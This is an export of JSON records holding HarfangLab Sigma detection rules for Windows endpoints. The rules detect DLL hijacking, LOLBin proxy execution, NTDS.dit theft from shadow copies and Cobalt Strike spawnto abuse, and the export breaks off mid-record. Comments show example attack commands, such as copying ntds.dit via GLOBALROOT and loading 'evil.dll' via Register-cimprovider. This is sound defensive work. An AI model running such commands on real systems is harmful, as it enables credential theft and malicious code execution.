+ "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.593760Z", + "creation_date": "2026-03-23T11:45:34.593764Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.593771Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_musnotificationux.yml", + "content": "title: DLL Hijacking via musnotificationux.exe\nid: 070c26de-9c37-4449-81eb-9d5f6a91c83b\ndescription: |\n Detects potential Windows DLL Hijacking via musnotificationux.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n 
- classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'musnotificationux.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\DMCmnUtils.dll'\n - '\\UpdatePolicy.dll'\n - '\\UPShared.dll'\n - '\\WINHTTP.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "070c26de-9c37-4449-81eb-9d5f6a91c83b", + "rule_name": "DLL Hijacking via musnotificationux.exe", + "rule_description": "Detects potential Windows DLL Hijacking via musnotificationux.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + 
"warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "072eb6a2-64bf-4b66-86f2-77e8e429ef63", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.586156Z", + "creation_date": "2026-03-23T11:45:34.586174Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.586191Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_auditpol.yml", + "content": "title: DLL Hijacking via auditpol.exe\nid: 072eb6a2-64bf-4b66-86f2-77e8e429ef63\ndescription: |\n Detects potential Windows DLL Hijacking via auditpol.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended 
to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'auditpol.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\auditpolcore.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "072eb6a2-64bf-4b66-86f2-77e8e429ef63", + "rule_name": "DLL Hijacking via auditpol.exe", + "rule_description": "Detects potential Windows DLL Hijacking via auditpol.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior 
of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "073992cd-3d71-4560-89eb-235eb6cfdf65", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.086864Z", + "creation_date": "2026-03-23T11:45:34.086867Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.086881Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", + "https://twitter.com/PhilipTsukerman/status/992021361106268161", + "https://attack.mitre.org/techniques/T1218/" + ], + "name": "t1218_register_cimprovider.yml", + "content": "title: Suspicious Proxy Execution via Register-cimprovider.exe\nid: 073992cd-3d71-4560-89eb-235eb6cfdf65\ndescription: |\n Detects the use of 
Register-cimprovider.exe which is used to register new WMI providers to proxy execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to execute malicious DLLs.\n Attackers may abused it to bypass security restrictions.\n It is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Register-CimProvider process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/\n - https://twitter.com/PhilipTsukerman/status/992021361106268161\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/03/01\nmodified: 2025/06/26\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.RegisterCimProvider\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Register-cimprovider.exe'\n - OriginalFileName: 'Register-CimProvider2.exe'\n\n selection_command:\n # C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path C:\\AtomicRedTeam\\atomics\\T1218\\src\\Win32\\T1218-2.dll\n # Register-cimprovider -path \"C:\\folder\\evil.dll\"\n CommandLine|contains|all:\n - ' -path '\n - '.dll'\n\n exclusion_programfiles:\n CommandLine|contains:\n - ' -Path ?:\\Program Files\\'\n - ' -Path ?:\\Program Files (x86)\\'\n\n # https://learn.microsoft.com/fr-fr/troubleshoot/mem/configmgr/endpoint-protection/configmgr-console-shows-out-of-date-values\n exclusion_protectionmanagement:\n CommandLine|contains|all:\n - '-ProviderName ProtectionManagement -Namespace root\\Microsoft\\protectionmanagement -Path'\n - '\\ProtectionManagement.dll'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + 
"rule_level_override": null, + "rule_id": "073992cd-3d71-4560-89eb-235eb6cfdf65", + "rule_name": "Suspicious Proxy Execution via Register-cimprovider.exe", + "rule_description": "Detects the use of Register-cimprovider.exe which is used to register new WMI providers to proxy execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to execute malicious DLLs.\nAttackers may abused it to bypass security restrictions.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for subsequent malicious actions stemming from the Register-CimProvider process.\n", + "rule_creation_date": "2022-03-01", + "rule_modified_date": "2025-06-26", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1218" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "074c0895-1c28-4998-833c-644cd8fa5ff0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.094771Z", + "creation_date": "2026-03-23T11:45:34.094773Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.094777Z", + 
"rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1003/003/", + "https://attack.mitre.org/techniques/T1006/" + ], + "name": "t1003_003_powershell_ntds_shadow_copy.yml", + "content": "title: NTDS Dumped from a Volume Shadow Copy via PowerShell\nid: 074c0895-1c28-4998-833c-644cd8fa5ff0\ndescription: |\n Detects a copy of the ntds.dit file from a Volume Shadow Copy with PowerShell in interactive mode.\n Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\n It is recommended to investigate the PowerShell command as well as other malicious commands executed on the domain controller to determine legitimacy.\nreferences:\n - https://attack.mitre.org/techniques/T1003/003/\n - https://attack.mitre.org/techniques/T1006/\ndate: 2022/05/10\nmodified: 2025/09/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.003\n - attack.t1078\n - attack.defense_evasion\n - attack.t1006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n # copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\NTDS.dit C:\\shadowcopy\n PowershellCommand|contains|all:\n - 'copy '\n - 'GLOBALROOT'\n - 'HarddiskVolumeShadowCopy'\n - 'ntds.dit'\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "074c0895-1c28-4998-833c-644cd8fa5ff0", + "rule_name": "NTDS Dumped from a Volume Shadow Copy via PowerShell", + "rule_description": "Detects a copy of the ntds.dit file from a Volume Shadow Copy 
with PowerShell in interactive mode.\nAdversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights.\nIt is recommended to investigate the PowerShell command as well as other malicious commands executed on the domain controller to determine legitimacy.\n", + "rule_creation_date": "2022-05-10", + "rule_modified_date": "2025-09-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access", + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1003.003", + "attack.t1006", + "attack.t1078" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "07c550a4-29ed-429b-8c3a-f6b59266b530", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.593517Z", + "creation_date": "2026-03-23T11:45:34.593520Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.593528Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + 
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/xforcered/WFH", + "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_sppextcomobj.yml", + "content": "title: DLL Hijacking via sppextcomobj.exe\nid: 07c550a4-29ed-429b-8c3a-f6b59266b530\ndescription: |\n Detects potential Windows DLL Hijacking via sppextcomobj.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'sppextcomobj.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\adsldpc.dll'\n - '\\CRYPTBASE.dll'\n - '\\DNSAPI.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - 
'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "07c550a4-29ed-429b-8c3a-f6b59266b530", + "rule_name": "DLL Hijacking via sppextcomobj.exe", + "rule_description": "Detects potential Windows DLL Hijacking via sppextcomobj.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2021-12-10", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "07ddc2b1-4842-43eb-92d7-df872335fcf9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": 
null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.098449Z", + "creation_date": "2026-03-23T11:45:34.098451Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.098455Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html", + "https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_adobe_licensing.yml", + "content": "title: DLL Hijacking via adobe_licensing_wf_helper.exe\nid: 07ddc2b1-4842-43eb-92d7-df872335fcf9\ndescription: |\n Detects potential Windows DLL Hijacking via Visual Studio adobe_licensing_wf_helper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - 
classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'adobe_licensing_wf_helper.exe'\n ProcessSignature: 'Adobe Inc.'\n ImageLoaded|endswith: '\\libcef.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Common Files\\Adobe\\'\n - '?:\\Program Files (x86)\\Adobe\\'\n - '?:\\Program Files\\Adobe\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\Adobe\\'\n - '?:\\Program Files (x86)\\Adobe\\'\n - '?:\\Program Files\\Adobe\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "07ddc2b1-4842-43eb-92d7-df872335fcf9", + "rule_name": "DLL Hijacking via adobe_licensing_wf_helper.exe", + "rule_description": "Detects potential Windows DLL Hijacking via Visual Studio adobe_licensing_wf_helper.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate signed executable to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-12-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": 
"0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "081076fd-302d-429b-88c3-9339633fee72", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.070904Z", + "creation_date": "2026-03-23T11:45:34.070906Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.070910Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b", + "https://redcanary.com/blog/blackbyte-ransomware/", + "https://attack.mitre.org/techniques/T1055/", + "https://attack.mitre.org/software/S0154/" + ], + "name": "t1055_suspicious_process_wuauclt.yml", + "content": "title: Suspicious wuauclt.exe Execution\nid: 081076fd-302d-429b-88c3-9339633fee72\ndescription: |\n Detects the execution of legitimate Windows Update Client (wuauclt.exe) Windows binary in a suspicious context.\n This can be the result of Cobalt Strike's exploitation via the spawnto setting to launch temporary jobs through this legitimate binary.\n It is recommended to analyze the newly created process and its parents for suspicious behavior or content.\nreferences:\n - 
https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b\n - https://redcanary.com/blog/blackbyte-ransomware/\n - https://attack.mitre.org/techniques/T1055/\n - https://attack.mitre.org/software/S0154/\ndate: 2022/01/25\nmodified: 2025/02/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - attack.s0154\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\wuauclt.exe'\n - OriginalFileName: 'wuauclt.exe'\n\n selection_existing_parent:\n ParentImage|contains: '\\'\n\n filter_parameters:\n # Command-line with no parameters\n CommandLine|contains: ' '\n\n filter_parentcommandline:\n ParentCommandLine:\n - '?:\\Windows\\System32\\mousocoreworker.exe -Embedding'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s wuauserv'\n - '?:\\Windows\\system32\\svchost.exe -k wuausvcs'\n - '?:\\Windows\\system32\\svchost.exe -k bitfsvcs'\n\n exclusion_explorer:\n ParentImage: '?:\\Windows\\explorer.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n\n exclusion_command:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage:\n - '?:\\Windows\\System32\\userinit.exe'\n - '?:\\Windows\\explorer.exe'\n\n exclusion_sihost1:\n ParentImage: '?:\\Windows\\System32\\sihost.exe'\n GrandparentCommandLine:\n - '?:\\windows\\System32\\svchost.exe -k netsvcs'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -s UserManager'\n - '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s UserManager'\n\n exclusion_sihost2:\n 
Ancestors|contains: '?:\\Windows\\System32\\cmd.exe|?:\\Windows\\System32\\sihost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "081076fd-302d-429b-88c3-9339633fee72", + "rule_name": "Suspicious wuauclt.exe Execution", + "rule_description": "Detects the execution of legitimate Windows Update Client (wuauclt.exe) Windows binary in a suspicious context.\nThis can be the result of Cobalt Strike's exploitation via the spawnto setting to launch temporary jobs through this legitimate binary.\nIt is recommended to analyze the newly created process and its parents for suspicious behavior or content.\n", + "rule_creation_date": "2022-01-25", + "rule_modified_date": "2025-02-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1055" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "08393432-4fef-4e8b-aa5e-fc13131e09c3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": 
